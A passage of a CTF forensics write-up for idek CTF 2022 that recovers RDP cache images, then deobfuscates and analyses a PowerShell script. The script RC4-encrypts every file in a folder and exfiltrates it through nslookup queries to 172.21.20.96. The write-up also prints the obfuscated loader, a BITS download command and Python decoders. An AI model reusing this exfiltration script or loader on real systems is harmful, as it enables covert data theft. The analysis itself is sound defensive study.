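        reasons.append(f"{b64_labels} base64-looking labels")
    if entropy >= 4.5:          # assumed threshold; hex/word labels stay below it
        reasons.append(f"entropy {entropy:.2f} bits/char")
    if len(name) > 150:
        reasons.append(f"name length {len(name)}")
    return reasons


def find_tunnel_candidates(field_output: str, min_reasons: int = 2) -> list:
    """Scan tshark field output and keep names that trip at least `min_reasons` checks."""
    hits = []
    for line in field_output.splitlines():
        name = line.strip()
        if not name:
            continue
        reasons = tunnel_indicators(name)
        if len(reasons) >= min_reasons:
            hits.append((name, reasons))
    return hits


def group_by_trailing_label(names) -> dict:
    """Count candidates per trailing label, decoding it as base64 when it is valid."""
    counts = {}
    for name in names:
        label = name.rstrip(".").split(".")[-1]
        try:
            key = base64.b64decode(label, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            key = label                      # not base64: keep the raw label as the key
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_tunnel_candidates(SAMPLE_QUERY_NAMES)
    for name, reasons in hits:
        print(name[:40] + "...", "->", "; ".join(reasons))
    print(group_by_trailing_label(n for n, _ in hits))
```

Requiring two independent indicators is what keeps legitimate long names (CDN hashes, DKIM or DMARC lookups) from tripping the rule; in a real deployment the same scoring would be applied per source host over a time window, since the volume of queries per trailing label is itself the strongest signal.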
+ Here the two files I care about are SecretPlan.pdf and update.ps1
+ But I still don't know where they are.
+ So DNS is out of hope for now; switch to RDP to continue analysing.
+ `RDP (Remote Desktop Protocol) is a protocol developed by Microsoft that lets users connect to and remotely control computers running Windows.`
+ The key lies in the cache files: they are temporary data files created to improve the performance of an application. In the case of RDP, the cache files store temporary data related to the remote session. They can contain images, fonts or other data to reduce latency during transfer between the source and destination machines.
+ I went back to FTK Imager to look for cache files in the original hard disk image.
+ Under the path `C:\Users\IEUser\AppData\Local\Microsoft\Terminal Server Client\Cache\`, I found 3 cache files.

+ Use the tool [BMC](https://github.com/ANSSI-FR/bmc-tools) to analyse these cache files.
+ Run the commands from cmd on Windows
```
$python bmc-tools.py -s "C:\Users\ASUS\Downloads\1\idek ctf 2022\Cache0000.bin" -d ./0
$python bmc-tools.py -s "C:\Users\ASUS\Downloads\1\idek ctf 2022\Cache0001.bin" -d ./1
$python bmc-tools.py -s "C:\Users\ASUS\Downloads\1\idek ctf 2022\Cache0002.bin" -d ./2
```

+ Then, stitching the images in folder 2 together (in reverse order), I obtained a URL:

+ => `Start-BitsTransfer Source https://gist.githubusercontent.com/bquanman/cb6a4b2420d9f3d2f27287dcb46661d6/raw/5c30ba3542b952e2be68491c825f0145ed0da14e/update.ps1 -Destination “C:\Users\Administrator\Documents\Work\CONFIDENTAL\Project Bluezone`
+ Option 2: open the 3 files with `bitmapcacheviewer.exe`

+ Opening that link, I got a PowerShell command:
```
&( $EnV:COmsPEC[4,15,25]-JoiN'')( new-oBJeCt io.STREaMrEADEr(( new-oBJeCt io.cOMpreSsIoN.DeflaTestREAM( [IO.MEmoryStreAm] [sYStEm.ConVeRT]::FROMBase64stRiNG('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') ,[system.iO.coMPressIoN.CoMpressIonMODe]::DecoMPREsS)) , [TExT.EncoDINg]::ascII) ).REaDtOeNd( )
```
+ From here there are 2 ways:
1. Base64-decode + raw inflate, then run the PowerShell with `echo` (twice)
2. Use PowerDecode to run it
+ Here I used option 2 for convenience:

+ [Deobfuscated file](https://github.com/KMANVK/idek-ctf-2022/blob/main/HiddenGem%20Mixtape%203%20The%20Ultimate%20Goal/PowerDecode_report_0ce0bf4f-06f1-4177-b10c-ff5b8af3dac0.txt)
+ After deobfuscation, the original code is:
```
$d = "172.21.20.96"
$s = 4
$b = 57
Get-ChildItem "." | ForEach-Object {
    $a = [System.Convert]::ToBase64String($Enc.GetBytes($_.Name))
    # RC4: key scheduling followed by the keystream XOR
    $R = {
        $D, $K = $Args
        $S = 0..255
        0..255 | ForEach-Object {
            $J = ($J + $S[$_] + $K[$_ % $K.Length]) % 256
            $S[$_], $S[$J] = $S[$J], $S[$_]
        }
        $D | ForEach-Object {
            $I = ($I + 1) % 256
            $H = ($H + $S[$I]) % 256
            $S[$I], $S[$H] = $S[$H], $S[$I]
            $_ -bxor $S[($S[$I] + $S[$H]) % 256]
        }
    }
    $Enc = [System.Text.Encoding]::ASCII
    $p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)')
    $z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName))
    $u = (& $R $z $p)
    $e = [System.Convert]::ToBase64String($u)
    $l = $e.Length
    $r = ""
    $n = 0
    # split the base64 ciphertext into $b-character labels, $s labels per query
    while ($n -le ($l / $b)) {
        $c = $b
        if (($n * $b) + $c -gt $l) {
            $c = $l - ($n * $b)
        }
        $r += $e.Substring($n * $b, $c) + "."
        if (($n % $s) -eq ($s - 1)) {
            nslookup -type=A "$r$a.$d"
            $r = ""
        }
        $n = $n + 1
    }
    nslookup -type=A "$r$a.$d"
}
```
+ A quick analysis:
+ Variable initialisation:
```
$d = "172.21.20.96"
$s = 4
$b = 57
```
`$d` is a specific IP address. `$s` and `$b` are parameters used while processing the data: `$b` is the chunk length and `$s` is the number of chunks sent per query.
+ RC4 function:
```
$R = {
    # ...
}
```
This scriptblock implements the RC4 algorithm. It takes a byte array `$D` and a key `$K`, and returns the encrypted data.
+ File processing:
```
Get-ChildItem "." | ForEach-Object {
    # ...
}
```
This loop processes every file in the current directory.
+ Encryption and key:
```
$Enc = [System.Text.Encoding]::ASCII
$p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)')
$z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName))
$u = (& $R $z $p)
```
+ `$p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)')`: converts the literal string of the PowerShell command into a byte array. The string is the code that reads all bytes of the current file (`$_.FullName`), and it is used as the key.
+ `$z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName))`: reads the actual content of the file (`$_.FullName`) and converts it into a byte array.
+ `$u = (& $R $z $p)`: calls the RC4 function with the file content (`$z`) and the key (`$p`). The result is stored in `$u`.
+ Encoding and sending DNS queries:
```
while ($n -le ($l / $b)) {
    # ...
}
```
+ This loop splits the encrypted data into pieces of `$b` characters and sends DNS queries for them.
+ Every `$s` iterations it sends one DNS query using nslookup.
+ Using nslookup to send the DNS query:
```
nslookup -type=A "$r$a.$d"
```
=> nslookup sends a DNS query whose name is built from the encrypted data together with the IP address.
+ In short, the script splits the data, encrypts it with RC4, then sends DNS queries to transmit the encrypted data to a specific IP address. This is a way to communicate between a machine and a server over DNS, possibly to bypass network monitoring or to carry out malicious activity; it is an example of the technique known as "DNS tunneling".
+ Now write a script to decode the base64 data from those DNS queries.
+ The query name structure is `$r$a.$d`
+ In the script, `$r` holds the RC4-encrypted data (base64, split into dot-separated chunks), `$a` is the base64 file name, which is exactly what I decoded earlier:
`{b'des.txt': 4, b'KCSC.jpg': 421, b'readme.txt': 8, b'readme2.txt': 6, b'SecretPlan.pdf': 1329, b'update.ps1': 58, b'vov.txt': 4, b'zoneblue.jpg': 159}`
+ and `$d` is the IP address 172.21.20.96. For example:
```
A1ffdIcmCEFp9W1NoM9mXNPVhyIFP7jNK8zI9s0FCdftmj918IdsXLSOF.VOuMylDxFIz3h5Iasx+sBeFpsZiIl3M89QABg+o4fPImEGEAOy46x8yeL.7rAU5aLbfmBBWWMlLuXn/JE9at/ATzoMUf7vLSQ8Nm68UxOK9NrLELOoR.UPgtG2FiDIAt/lMp1pgI0RdzfutBnpBpK2Om16BpS2jHTT6p2nbxwYSYl.U2VjcmV0UGxhbi5wZGY=
```
+ $r = A1ffdIcmCEFp9W1NoM9mXNPVhyIFP7jNK8zI9s0FCdftmj918IdsXLSOF.VOuMylDxFIz3h5Iasx+sBeFpsZiIl3M89QABg+o4fPImEGEAOy46x8yeL.7rAU5aLbfmBBWWMlLuXn/JE9at/ATzoMUf7vLSQ8Nm68UxOK9NrLELOoR.UPgtG2FiDIAt/lMp1pgI0RdzfutBnpBpK2Om16BpS2jHTT6p2nbxwYSYl. (the four 57-character chunks)
+ $a = U2VjcmV0UGxhbi5wZGY= (base64 of `SecretPlan.pdf`)
+ $d = 172.21.20.96
+ And the key is `$p` == `[System.IO.File]::ReadAllBytes($_.FullName)`

+ Now the code to decrypt the RC4 layer and decode the base64:
```
from base64 import b64decode
from Crypto.Cipher import ARC4
from Crypto.Util.number import long_to_bytes


def rc4_decrypt(data, key1):
    # data is the base64 text reassembled from the DNS labels
    data = b64decode(data)
    key = bytes(key1, encoding='utf-8')
    enc = ARC4.new(key)
    return enc.decrypt(data)


Dict = {}
lines = open("3.txt", "r").readlines()
# first pass: count how many query lines belong to each file (last label = base64 file name)
for x in lines:
    key = b64decode(x.strip().split(".")[-1]).decode()
    Dict[key] = Dict.get(key, 0) + 1
print(Dict)

# second pass: the lines of one file are consecutive, so concatenate their
# ciphertext chunks (every label except the file-name label) in order
flag = 0
for key, value in list(Dict.items()):
    temp = ""
    for i in range(value):
        temp += "".join(lines[flag].split(".")[:-1])
        flag += 1
    Dict[key] = temp

Rc4Key = '[System.IO.File]::ReadAllBytes($_.FullName)'
for key, value in Dict.items():
    try:
        # PowerShell stringified the byte[] as space-separated decimals, so the
        # RC4 plaintext looks like "37 80 68 70 ..." and must be turned back into bytes
        open(key, "wb").write(
            b"".join(long_to_bytes(int(x)) for x in rc4_decrypt(value, Rc4Key).split(b" ")))
        print(key + " write success!")
    except Exception:
        pass
```
+ After running it I got those 8 files, and opening `SecretPlan.pdf` gives a pastebin link leading to the flag.
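The decoder above depends on the capture and on pycryptodome, so there is no way to check it offline. The following is an added example (mine, not the challenge author's code) that reimplements the format end to end in pure Python: RC4 as in the `$R` scriptblock, the `$OFS` quirk by which PowerShell turns a byte array into a space-separated decimal string before `GetBytes()` sees it, the 57-character / 4-chunks-per-query splitting, and a decoder that regroups query names by file and handles both the form with the `172.21.20.96` suffix and the stripped form in b64.txt. `build_query_names` is only a test fixture that reproduces what the loop emits for a constructed file, so the decoder can be verified without a pcap; the key, chunk sizes and suffix are the values from the deobfuscated script.

```python
import base64

# Values taken from the deobfuscated script above
RC4_KEY = b"[System.IO.File]::ReadAllBytes($_.FullName)"   # $p
CHUNK_LEN = 57                                              # $b
CHUNKS_PER_QUERY = 4                                        # $s
DNS_SUFFIX = "172.21.20.96"                                 # $d


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), the same scheme as the $R scriptblock; encrypt == decrypt."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


def powershell_ofs_string(content: bytes) -> str:
    """What $Enc.GetBytes() actually saw: PowerShell stringifies a byte[] as
    space-separated decimals ($OFS), so the RC4 plaintext is text, not raw bytes."""
    return " ".join(str(b) for b in content)


def build_query_names(filename: str, content: bytes) -> list:
    """Test fixture only: reproduce the query names the loop above emits for one
    constructed file, so the decoder can be checked offline without a capture."""
    e = base64.b64encode(rc4(RC4_KEY, powershell_ofs_string(content).encode("ascii"))).decode()
    a = base64.b64encode(filename.encode("ascii")).decode()
    names, r, n, l = [], "", 0, len(e)
    while n <= l / CHUNK_LEN:                      # float division, as in PowerShell
        c = min(CHUNK_LEN, l - n * CHUNK_LEN)      # last chunk may be short (or empty)
        r += e[n * CHUNK_LEN:n * CHUNK_LEN + c] + "."
        if n % CHUNKS_PER_QUERY == CHUNKS_PER_QUERY - 1:
            names.append(f"{r}{a}.{DNS_SUFFIX}")
            r = ""
        n += 1
    names.append(f"{r}{a}.{DNS_SUFFIX}")          # flush of the final partial group
    return names


def reassemble(names, suffix: str = DNS_SUFFIX) -> dict:
    """Group query names by file name and concatenate their ciphertext chunks in order.
    Works with or without the IP suffix (the b64.txt listing above had it stripped)."""
    parts = {}
    for name in names:
        name = name.strip().rstrip(".")
        if suffix and name.endswith("." + suffix):
            name = name[:-len(suffix) - 1]
        labels = name.split(".")
        fname = base64.b64decode(labels[-1]).decode("ascii")
        parts.setdefault(fname, []).append("".join(labels[:-1]))   # empty labels vanish here
    return {fname: "".join(chunks) for fname, chunks in parts.items()}


def decrypt_file(b64_cipher: str) -> bytes:
    """Undo base64 + RC4, then undo the $OFS decimal quirk; fall back to raw bytes."""
    plain = rc4(RC4_KEY, base64.b64decode(b64_cipher))
    tokens = plain.decode("ascii", errors="replace").split()
    if tokens and all(t.isdigit() and int(t) < 256 for t in tokens):
        return bytes(int(t) for t in tokens)
    return plain


if __name__ == "__main__":
    sample = bytes(range(256)) + b"constructed sample file"
    names = build_query_names("SecretPlan.pdf", sample)
    recovered = reassemble(names)
    print(len(names), "queries;", decrypt_file(recovered["SecretPlan.pdf"]) == sample)
```

The decimal-string detour roughly triples the number of DNS queries needed per file, which is one reason the counts above are so lopsided (1329 queries for SecretPlan.pdf); the fallback in `decrypt_file` covers the case where a sample of the script is run on a host whose `$OFS` has been changed.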



## HiddenGem Mixtape 2: Credential Access
### Des :

### Sol :